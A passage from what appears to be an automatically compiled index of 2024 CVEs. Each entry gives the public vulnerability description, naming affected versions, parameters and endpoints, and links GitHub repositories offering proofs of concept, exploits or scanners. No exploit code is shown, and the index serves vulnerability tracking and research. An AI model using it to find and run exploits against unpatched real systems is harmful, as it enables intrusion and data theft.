+ + +- [giovannipajeu1/CVE-2024-23741](https://github.com/giovannipajeu1/CVE-2024-23741) + +### CVE-2024-23742 (2024-01-28) + +An issue in Loom on macOS version 0.196.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor disputes this because it requires local access to a victim's machine. + + +- [giovannipajeu1/CVE-2024-23742](https://github.com/giovannipajeu1/CVE-2024-23742) + +### CVE-2024-23743 (2024-01-28) + +Notion through 3.1.0 on macOS might allow code execution because of RunAsNode and enableNodeClilnspectArguments. NOTE: the vendor states "the attacker must launch the Notion Desktop application with nonstandard flags that turn the Electron-based application into a Node.js execution environment." + + +- [giovannipajeu1/CVE-2024-23743](https://github.com/giovannipajeu1/CVE-2024-23743) + +### CVE-2024-23745 (2024-01-31) + +In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context. NOTE: the vendor's perspective is that this is simply an instance of CVE-2022-48505, cannot properly be categorized as a product-level vulnerability, and cannot have a product-level fix because it is about incorrect caching of file signatures on macOS. + + +- [louiselalanne/CVE-2024-23745](https://github.com/louiselalanne/CVE-2024-23745) + +### CVE-2024-23746 (2024-02-02) + +Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents). + + +- [louiselalanne/CVE-2024-23746](https://github.com/louiselalanne/CVE-2024-23746) + +### CVE-2024-23747 (2024-01-29) + +The Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability resides in the system's handling of user data access through a /Modernanet/LAUDO/LAU0000100/Laudo?id= URI. By manipulating this id parameter, an attacker can gain access to sensitive medical information. + + +- [louiselalanne/CVE-2024-23747](https://github.com/louiselalanne/CVE-2024-23747) + +### CVE-2024-23772 (2024-04-30) + +An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An Arbitrary file create vulnerability exists in the KSchedulerSvc.exe, KUserAlert.exe, and Runkbot.exe components. This allows local attackers to create any file of their choice with NT Authority\SYSTEM privileges. + + +- [Verrideo/CVE-2024-23772](https://github.com/Verrideo/CVE-2024-23772) + +### CVE-2024-23773 (2024-04-30) + +An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An Arbitrary file delete vulnerability exists in the KSchedulerSvc.exe component. Local attackers can delete any file of their choice with NT Authority\SYSTEM privileges. + + +- [Verrideo/CVE-2024-23773](https://github.com/Verrideo/CVE-2024-23773) + +### CVE-2024-23774 (2024-04-30) + +An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An unquoted Windows search path vulnerability exists in the KSchedulerSvc.exe and AMPTools.exe components. This allows local attackers to execute code of their choice with NT Authority\SYSTEM privileges. + + +- [Verrideo/CVE-2024-23774](https://github.com/Verrideo/CVE-2024-23774) + +### CVE-2024-23780 +- [HazardLab-IO/CVE-2024-23780](https://github.com/HazardLab-IO/CVE-2024-23780) + +### CVE-2024-23897 (2024-01-24) + +Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. + + +- [jenkinsci-cert/SECURITY-3314-3315](https://github.com/jenkinsci-cert/SECURITY-3314-3315) +- [binganao/CVE-2024-23897](https://github.com/binganao/CVE-2024-23897) +- [h4x0r-dz/CVE-2024-23897](https://github.com/h4x0r-dz/CVE-2024-23897) +- [xaitax/CVE-2024-23897](https://github.com/xaitax/CVE-2024-23897) +- [vmtyan/poc-cve-2024-23897](https://github.com/vmtyan/poc-cve-2024-23897) +- [yoryio/CVE-2024-23897](https://github.com/yoryio/CVE-2024-23897) +- [3yujw7njai/CVE-2024-23897](https://github.com/3yujw7njai/CVE-2024-23897) +- [10T4/PoC-Fix-jenkins-rce_CVE-2024-23897](https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897) +- [wjlin0/CVE-2024-23897](https://github.com/wjlin0/CVE-2024-23897) +- [Vozec/CVE-2024-23897](https://github.com/Vozec/CVE-2024-23897) +- [r0xdeadbeef/CVE-2024-23897](https://github.com/r0xdeadbeef/CVE-2024-23897) +- [viszsec/CVE-2024-23897](https://github.com/viszsec/CVE-2024-23897) +- [jopraveen/CVE-2024-23897](https://github.com/jopraveen/CVE-2024-23897) +- [AbraXa5/Jenkins-CVE-2024-23897](https://github.com/AbraXa5/Jenkins-CVE-2024-23897) +- [brijne/CVE-2024-23897-RCE](https://github.com/brijne/CVE-2024-23897-RCE) +- [WLXQqwer/Jenkins-CVE-2024-23897-](https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-) +- [kaanatmacaa/CVE-2024-23897](https://github.com/kaanatmacaa/CVE-2024-23897) +- [Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability](https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability) +- [B4CK4TT4CK/CVE-2024-23897](https://github.com/B4CK4TT4CK/CVE-2024-23897) +- [godylockz/CVE-2024-23897](https://github.com/godylockz/CVE-2024-23897) +- [ifconfig-me/CVE-2024-23897](https://github.com/ifconfig-me/CVE-2024-23897) +- [ThatNotEasy/CVE-2024-23897](https://github.com/ThatNotEasy/CVE-2024-23897) +- [pulentoski/CVE-2024-23897-Arbitrary-file-read](https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read) +- [Nebian/CVE-2024-23897](https://github.com/Nebian/CVE-2024-23897) +- [JAthulya/CVE-2024-23897](https://github.com/JAthulya/CVE-2024-23897) +- [murataydemir/CVE-2024-23897](https://github.com/murataydemir/CVE-2024-23897) +- [mil4ne/CVE-2024-23897-Jenkins-4.441](https://github.com/mil4ne/CVE-2024-23897-Jenkins-4.441) +- [Maalfer/CVE-2024-23897](https://github.com/Maalfer/CVE-2024-23897) +- [Surko888/Surko-Exploit-Jenkins-CVE-2024-23897](https://github.com/Surko888/Surko-Exploit-Jenkins-CVE-2024-23897) +- [cc3305/CVE-2024-23897](https://github.com/cc3305/CVE-2024-23897) +- [BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety](https://github.com/BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety) +- [ShieldAuth-PHP/PBL05-CVE-Analsys](https://github.com/ShieldAuth-PHP/PBL05-CVE-Analsys) +- [verylazytech/CVE-2024-23897](https://github.com/verylazytech/CVE-2024-23897) +- [D1se0/CVE-2024-23897-Vulnerabilidad-Jenkins](https://github.com/D1se0/CVE-2024-23897-Vulnerabilidad-Jenkins) +- [Marouane133/jenkins-lfi](https://github.com/Marouane133/jenkins-lfi) + +### CVE-2024-23995 (2024-04-29) + +Cross Site Scripting (XSS) in Beekeeper Studio 4.1.13 and earlier allows remote attackers to execute arbitrary code in the column name of a database table in tabulator-popup-container. + + +- [EQSTLab/CVE-2024-23995](https://github.com/EQSTLab/CVE-2024-23995) + +### CVE-2024-23997 (2024-07-05) + +Lukas Bach yana =<1.0.16 is vulnerable to Cross Site Scripting (XSS) via src/electron-main.ts. + + +- [EQSTLab/CVE-2024-23997](https://github.com/EQSTLab/CVE-2024-23997) + +### CVE-2024-23998 (2024-07-05) + +goanother Another Redis Desktop Manager =<1.6.1 is vulnerable to Cross Site Scripting (XSS) via src/components/Setting.vue. + + +- [EQSTLab/CVE-2024-23998](https://github.com/EQSTLab/CVE-2024-23998) + +### CVE-2024-24034 (2024-02-08) + +Setor Informatica S.I.L version 3.0 is vulnerable to Open Redirect via the hprinter parameter, allows remote attackers to execute arbitrary code. + + +- [ELIZEUOPAIN/CVE-2024-24034](https://github.com/ELIZEUOPAIN/CVE-2024-24034) + +### CVE-2024-24035 (2024-03-07) + +Cross Site Scripting (XSS) vulnerability in Setor Informatica SIL 3.1 allows attackers to run arbitrary code via the hmessage parameter. + + +- [ELIZEUOPAIN/CVE-2024-24035](https://github.com/ELIZEUOPAIN/CVE-2024-24035) + +### CVE-2024-24134 (2024-01-29) + +Sourcecodester Online Food Menu 1.0 is vulnerable to Cross Site Scripting (XSS) via the 'Menu Name' and 'Description' fields in the Update Menu section. + + +- [BurakSevben/CVE-2024-24134](https://github.com/BurakSevben/CVE-2024-24134) + +### CVE-2024-24135 (2024-01-29) + +Product Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSS attacks. + + +- [BurakSevben/CVE-2024-24135](https://github.com/BurakSevben/CVE-2024-24135) + +### CVE-2024-24136 (2024-01-29) + +The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks. + + +- [BurakSevben/CVE-2024-24136](https://github.com/BurakSevben/CVE-2024-24136) + +### CVE-2024-24137 +- [BurakSevben/CVE-2024-24137](https://github.com/BurakSevben/CVE-2024-24137) + +### CVE-2024-24138 +- [BurakSevben/CVE-2024-24138](https://github.com/BurakSevben/CVE-2024-24138) + +### CVE-2024-24139 (2024-01-29) + +Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter. + + +- [BurakSevben/CVE-2024-24139](https://github.com/BurakSevben/CVE-2024-24139) + +### CVE-2024-24140 (2024-01-29) + +Sourcecodester Daily Habit Tracker App 1.0 allows SQL Injection via the parameter 'tracker.' + + +- [BurakSevben/CVE-2024-24140](https://github.com/BurakSevben/CVE-2024-24140) + +### CVE-2024-24141 (2024-01-29) + +Sourcecodester School Task Manager App 1.0 allows SQL Injection via the 'task' parameter. + + +- [BurakSevben/CVE-2024-24141](https://github.com/BurakSevben/CVE-2024-24141) + +### CVE-2024-24142 (2024-02-13) + +Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter. + + +- [BurakSevben/CVE-2024-24142](https://github.com/BurakSevben/CVE-2024-24142) + +### CVE-2024-24336 (2024-03-19) + +A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version 23.05.05 and earlier allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components. + + +- [nitipoom-jar/CVE-2024-24336](https://github.com/nitipoom-jar/CVE-2024-24336) + +### CVE-2024-24337 (2024-02-12) + +CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components. + + +- [nitipoom-jar/CVE-2024-24337](https://github.com/nitipoom-jar/CVE-2024-24337) + +### CVE-2024-24386 (2024-02-15) + +An issue in VitalPBX v.3.2.4-5 allows an attacker to execute arbitrary code via a crafted payload to the /var/lib/vitalpbx/scripts folder. + + +- [erick-duarte/CVE-2024-24386](https://github.com/erick-duarte/CVE-2024-24386) + +### CVE-2024-24396 (2024-02-05) + +Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component. + + +- [trustcves/CVE-2024-24396](https://github.com/trustcves/CVE-2024-24396) + +### CVE-2024-24397 (2024-02-05) + +Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field. + + +- [trustcves/CVE-2024-24397](https://github.com/trustcves/CVE-2024-24397) + +### CVE-2024-24398 (2024-02-06) + +Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function. + + +- [trustcves/CVE-2024-24398](https://github.com/trustcves/CVE-2024-24398) + +### CVE-2024-24401 (2024-02-26) + +SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component. + + +- [MAWK0235/CVE-2024-24401](https://github.com/MAWK0235/CVE-2024-24401) + +### CVE-2024-24402 (2024-02-26) + +An issue in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted script to the /usr/local/nagios/bin/npcd component. + + +- [MAWK0235/CVE-2024-24402](https://github.com/MAWK0235/CVE-2024-24402) + +### CVE-2024-24409 (2024-11-08) + +Zohocorp ManageEngine ADManager Plus versions 7203 and prior are vulnerable to Privilege Escalation in the Modify Computers option. + + +- [passtheticket/CVE-2024-24409](https://github.com/passtheticket/CVE-2024-24409) + +### CVE-2024-24488 (2024-02-07) + +An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component. + + +- [minj-ae/CVE-2024-24488](https://github.com/minj-ae/CVE-2024-24488) + +### CVE-2024-24549 (2024-03-13) + +Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.\n\nUsers are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.\n\n + + +- [Abdurahmon3236/CVE-2024-24549](https://github.com/Abdurahmon3236/CVE-2024-24549) +- [JFOZ1010/CVE-2024-24549](https://github.com/JFOZ1010/CVE-2024-24549) + +### CVE-2024-24576 (2024-04-09) + +Rust is a programming language. The Rust Security Response WG was notified that the Rust standard library prior to version 1.77.2 did not properly escape arguments when invoking batch files (with the `bat` and `cmd` extensions) on Windows using the `Command`. An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping. The severity of this vulnerability is critical for those who invoke batch files on Windows with untrusted arguments. No other platform or use is affected.\n\nThe `Command::arg` and `Command::args` APIs state in their documentation that the arguments will be passed to the spawned process as-is, regardless of the content of the arguments, and will not be evaluated by a shell. This means it should be safe to pass untrusted input as an argument.\n\nOn Windows, the implementation of this is more complex than other platforms, because the Windows API only provides a single string containing all the arguments to the spawned process, and it's up to the spawned process to split them. Most programs use the standard C run-time argv, which in practice results in a mostly consistent way arguments are splitted.\n\nOne exception though is `cmd.exe` (used among other things to execute batch files), which has its own argument splitting logic. That forces the standard library to implement custom escaping for arguments passed to batch files. Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution.\n\nDue to the complexity of `cmd.exe`, we didn't identify a solution that would correctly escape arguments in all cases. To maintain our API guarantees, we improved the robustness of the escaping code, and changed the `Command` API to return an `InvalidInput` error when it cannot safely escape an argument. This error will be emitted when spawning the process.\n\nThe fix is included in Rust 1.77.2. Note that the new escaping logic for batch files errs on the conservative side, and could reject valid arguments. Those who implement the escaping themselves or only handle trusted inputs on Windows can also use the `CommandExt::raw_arg` method to bypass the standard library's escaping logic. + + +- [frostb1ten/CVE-2024-24576-PoC](https://github.com/frostb1ten/CVE-2024-24576-PoC) +- [brains93/CVE-2024-24576-PoC-Python](https://github.com/brains93/CVE-2024-24576-PoC-Python) +- [aydinnyunus/CVE-2024-24576-Exploit](https://github.com/aydinnyunus/CVE-2024-24576-Exploit) +- [foxoman/CVE-2024-24576-PoC---Nim](https://github.com/foxoman/CVE-2024-24576-PoC---Nim) +- [corysabol/batbadbut-demo](https://github.com/corysabol/batbadbut-demo) +- [mishl-dev/CVE-2024-24576-PoC-Python](https://github.com/mishl-dev/CVE-2024-24576-PoC-Python) +- [lpn/CVE-2024-24576.jl](https://github.com/lpn/CVE-2024-24576.jl) +- [Gaurav1020/CVE-2024-24576-PoC-Rust](https://github.com/Gaurav1020/CVE-2024-24576-PoC-Rust) +- [SheL3G/CVE-2024-24576-PoC-BatBadBut](https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut) + +### CVE-2024-24590 (2024-02-06) + +Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.\n + + +- [OxyDeV2/ClearML-CVE-2024-24590](https://github.com/OxyDeV2/ClearML-CVE-2024-24590) +- [xffsec/CVE-2024-24590-ClearML-RCE-Exploit](https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit) +- [diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC](https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC) +- [junnythemarksman/CVE-2024-24590](https://github.com/junnythemarksman/CVE-2024-24590) +- [sviim/ClearML-CVE-2024-24590-RCE](https://github.com/sviim/ClearML-CVE-2024-24590-RCE) +- [Bigb972003/cve-2024-24590](https://github.com/Bigb972003/cve-2024-24590) +- [j3r1ch0123/CVE-2024-24590](https://github.com/j3r1ch0123/CVE-2024-24590) + +### CVE-2024-24684 (2024-05-28) + +Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the header parsing occuring while processing an `.off` file via the `readOFF` function. \r\n\r\n\r\nWe can see above that at [0] a stack-based buffer called `comment` is defined with an hardcoded size of `1000 bytes`. The call to `fscanf` at [1] is unsafe and if the first line of the header of the `.off` files is longer than 1000 bytes it will overflow the `header` buffer. + + +- [SpiralBL0CK/CVE-2024-24684](https://github.com/SpiralBL0CK/CVE-2024-24684) + +### CVE-2024-24685 (2024-05-28) + +Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the parsing of comments within the vertex section of an `.off` file processed via the `readOFF` function. + + +- [SpiralBL0CK/CVE-2024-24685](https://github.com/SpiralBL0CK/CVE-2024-24685) + +### CVE-2024-24686 (2024-05-28) + +Multiple stack-based buffer overflow vulnerabilities exist in the readOFF functionality of libigl v2.5.0. A specially crafted .off file can lead to stack-based buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability concerns the parsing of comments within the faces section of an `.off` file processed via the `readOFF` function. + + +- [SpiralBL0CK/CVE-2024-24686](https://github.com/SpiralBL0CK/CVE-2024-24686) + +### CVE-2024-24725 (2024-03-23) + +Gibbon through 26.0.00 allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the modules/System%20Admin/import_run.php&type=externalAssessment&step=4 URI. + + +- [MelkorW/CVE-2024-24725-PoC](https://github.com/MelkorW/CVE-2024-24725-PoC) + +### CVE-2024-24760 (2024-02-02) + +mailcow is a dockerized email package, with multiple containers linked in one bridged network. A security vulnerability has been identified in mailcow affecting versions < 2024-01c. This vulnerability potentially allows attackers on the same subnet to connect to exposed ports of a Docker container, even when the port is bound to 127.0.0.1. The vulnerability has been addressed by implementing additional iptables/nftables rules. These rules drop packets for Docker containers on ports 3306, 6379, 8983, and 12345, where the input interface is not `br-mailcow` and the output interface is `br-mailcow`. + + +- [killerbees19/CVE-2024-24760](https://github.com/killerbees19/CVE-2024-24760) + +### CVE-2024-24787 (2024-05-08) + +On Darwin, building a Go module which contains CGO can trigger arbitrary code execution when using the Apple version of ld, due to usage of the -lto_library flag in a "#cgo LDFLAGS" directive. + + +- [LOURC0D3/CVE-2024-24787-PoC](https://github.com/LOURC0D3/CVE-2024-24787-PoC) + +### CVE-2024-24809 (2024-04-10) + +Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue. + + +- [gh-ost00/CVE-2024-24809-Proof-of-concept](https://github.com/gh-ost00/CVE-2024-24809-Proof-of-concept) + +### CVE-2024-24816 (2024-02-07) + +CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability vulnerability has been discovered in versions prior to 4.24.0-lts in samples that use the `preview` feature. All integrators that use these samples in the production code can be affected. The vulnerability allows an attacker to execute JavaScript code by abusing the misconfigured preview feature. It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment. A fix is available in version 4.24.0-lts. + + +- [afine-com/CVE-2024-24816](https://github.com/afine-com/CVE-2024-24816) + +### CVE-2024-24919 (2024-05-28) + +Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available. + + +- [c3rrberu5/CVE-2024-24919](https://github.com/c3rrberu5/CVE-2024-24919) +- [emanueldosreis/CVE-2024-24919](https://github.com/emanueldosreis/CVE-2024-24919) +- [hendprw/CVE-2024-24919](https://github.com/hendprw/CVE-2024-24919) +- [LucasKatashi/CVE-2024-24919](https://github.com/LucasKatashi/CVE-2024-24919) +- [yagyuufellinluvv/CVE-2024-24919](https://github.com/yagyuufellinluvv/CVE-2024-24919) +- [Bytenull00/CVE-2024-24919](https://github.com/Bytenull00/CVE-2024-24919) +- [am-eid/CVE-2024-24919](https://github.com/am-eid/CVE-2024-24919) +- [P3wc0/CVE-2024-24919](https://github.com/P3wc0/CVE-2024-24919) +- [zam89/CVE-2024-24919](https://github.com/zam89/CVE-2024-24919) +- [satriarizka/CVE-2024-24919](https://github.com/satriarizka/CVE-2024-24919) +- [RevoltSecurities/CVE-2024-24919](https://github.com/RevoltSecurities/CVE-2024-24919) +- [Vulnpire/CVE-2024-24919](https://github.com/Vulnpire/CVE-2024-24919) +- [seed1337/CVE-2024-24919-POC](https://github.com/seed1337/CVE-2024-24919-POC) +- [0xYumeko/CVE-2024-24919](https://github.com/0xYumeko/CVE-2024-24919) +- [Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN](https://github.com/Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN) +- [smackerdodi/CVE-2024-24919-nuclei-templater](https://github.com/smackerdodi/CVE-2024-24919-nuclei-templater) +- [GoatSecurity/CVE-2024-24919](https://github.com/GoatSecurity/CVE-2024-24919) +- [GlobalsecureAcademy/CVE-2024-24919](https://github.com/GlobalsecureAcademy/CVE-2024-24919) +- [nexblade12/CVE-2024-24919](https://github.com/nexblade12/CVE-2024-24919) +- [un9nplayer/CVE-2024-24919](https://github.com/un9nplayer/CVE-2024-24919) +- [0xkalawy/CVE-2024-24919](https://github.com/0xkalawy/CVE-2024-24919) +- [Cappricio-Securities/CVE-2024-24919](https://github.com/Cappricio-Securities/CVE-2024-24919) +- [fernandobortotti/CVE-2024-24919](https://github.com/fernandobortotti/CVE-2024-24919) +- [nicolvsrlr27/CVE-2024-24919](https://github.com/nicolvsrlr27/CVE-2024-24919) +- [gurudattch/CVE-2024-24919](https://github.com/gurudattch/CVE-2024-24919) +- [YN1337/CVE-2024-24919](https://github.com/YN1337/CVE-2024-24919) +- [ifconfig-me/CVE-2024-24919-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner) +- [r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check](https://github.com/r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check) +- [r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN](https://github.com/r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN) +- [J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT](https://github.com/J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT) +- [mr-kasim-mehar/CVE-2024-24919-Exploit](https://github.com/mr-kasim-mehar/CVE-2024-24919-Exploit) +- [B1naryo/CVE-2024-24919-POC](https://github.com/B1naryo/CVE-2024-24919-POC) +- [Expl0itD0g/CVE-2024-24919---Poc](https://github.com/Expl0itD0g/CVE-2024-24919---Poc) +- [bigb0x/CVE-2024-24919-Sniper](https://github.com/bigb0x/CVE-2024-24919-Sniper) +- [birdlex/cve-2024-24919-checker](https://github.com/birdlex/cve-2024-24919-checker) +- [Rug4lo/CVE-2024-24919-Exploit](https://github.com/Rug4lo/CVE-2024-24919-Exploit) +- [0nin0hanz0/CVE-2024-24919-PoC](https://github.com/0nin0hanz0/CVE-2024-24919-PoC) +- [GuayoyoCyber/CVE-2024-24919](https://github.com/GuayoyoCyber/CVE-2024-24919) +- [0xans/CVE-2024-24919](https://github.com/0xans/CVE-2024-24919) +- [Tim-Hoekstra/CVE-2024-24919](https://github.com/Tim-Hoekstra/CVE-2024-24919) +- [starlox0/CVE-2024-24919-POC](https://github.com/starlox0/CVE-2024-24919-POC) +- [nullcult/CVE-2024-24919-Exploit](https://github.com/nullcult/CVE-2024-24919-Exploit) +- [satchhacker/cve-2024-24919](https://github.com/satchhacker/cve-2024-24919) +- [verylazytech/CVE-2024-24919](https://github.com/verylazytech/CVE-2024-24919) +- [protonnegativo/CVE-2024-24919](https://github.com/protonnegativo/CVE-2024-24919) +- [SalehLardhi/CVE-2024-24919](https://github.com/SalehLardhi/CVE-2024-24919) +- [ShadowByte1/CVE-2024-24919](https://github.com/ShadowByte1/CVE-2024-24919) +- [H3KEY/CVE-2024-24919](https://github.com/H3KEY/CVE-2024-24919) +- [Jutrm/cve-2024-24919](https://github.com/Jutrm/cve-2024-24919) +- [LuisMateo1/Arbitrary-File-Read-CVE-2024-24919](https://github.com/LuisMateo1/Arbitrary-File-Read-CVE-2024-24919) +- [AhmedMansour93/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-](https://github.com/AhmedMansour93/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-) +- [geniuszly/CVE-2024-24919](https://github.com/geniuszly/CVE-2024-24919) +- [skyrowalker/CVE-2024-24919](https://github.com/skyrowalker/CVE-2024-24919) +- [sar-3mar/CVE-2024-24919_POC](https://github.com/sar-3mar/CVE-2024-24919_POC) +- [NingXin2002/Check-Point_poc](https://github.com/NingXin2002/Check-Point_poc) + +### CVE-2024-24926 (2024-02-12) + +Deserialization of Untrusted Data vulnerability in UnitedThemes Brooklyn | Creative Multi-Purpose Responsive WordPress Theme.This issue affects Brooklyn | Creative Multi-Purpose Responsive WordPress Theme: from n/a through 4.9.7.6.\n\n + + +- [moften/CVE-2024-24926](https://github.com/moften/CVE-2024-24926) + +### CVE-2024-25092 (2024-06-09) + +Missing Authorization vulnerability in XLPlugins NextMove Lite.This issue affects NextMove Lite: from n/a through 2.17.0. + + +- [RandomRobbieBF/CVE-2024-25092](https://github.com/RandomRobbieBF/CVE-2024-25092) + +### CVE-2024-25153 (2024-03-13) + +A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells. + + +- [nettitude/CVE-2024-25153](https://github.com/nettitude/CVE-2024-25153) +- [rainbowhatrkn/CVE-2024-25153](https://github.com/rainbowhatrkn/CVE-2024-25153) + +### CVE-2024-25169 (2024-02-28) + +An issue in Mezzanine v6.0.0 allows attackers to bypass access control mechanisms in the admin panel via a crafted request. + + +- [shenhav12/CVE-2024-25169-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25169-Mezzanine-v6.0.0) + +### CVE-2024-25170 (2024-02-28) + +An issue in Mezzanine v6.0.0 allows attackers to bypass access controls via manipulating the Host header. + + +- [shenhav12/CVE-2024-25170-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25170-Mezzanine-v6.0.0) + +### CVE-2024-25175 (2024-03-25) + +An issue in Kickdler before v1.107.0 allows attackers to provide an XSS payload via a HTTP response splitting attack. + + +- [jet-pentest/CVE-2024-25175](https://github.com/jet-pentest/CVE-2024-25175) + +### CVE-2024-25202 (2024-02-28) + +Cross Site Scripting vulnerability in Phpgurukul User Registration & Login and User Management System 1.0 allows attackers to run arbitrary code via the search bar. + + +- [Agampreet-Singh/CVE-2024-25202](https://github.com/Agampreet-Singh/CVE-2024-25202) + +### CVE-2024-25227 (2024-03-15) + +SQL Injection vulnerability in ABO.CMS version 5.8, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter in admin login page. + + +- [thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227) +- [thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227) + +### CVE-2024-25277 +- [maen08/CVE-2024-25277](https://github.com/maen08/CVE-2024-25277) + +### CVE-2024-25278 +- [sajaljat/CVE-2024-25278](https://github.com/sajaljat/CVE-2024-25278) + +### CVE-2024-25279 +- [sajaljat/CVE-2024-25279](https://github.com/sajaljat/CVE-2024-25279) + +### CVE-2024-25280 +- [sajaljat/CVE-2024-25280](https://github.com/sajaljat/CVE-2024-25280) + +### CVE-2024-25281 +- [sajaljat/CVE-2024-25281](https://github.com/sajaljat/CVE-2024-25281) + +### CVE-2024-25291 (2024-02-29) + +Deskfiler v1.2.3 allows attackers to execute arbitrary 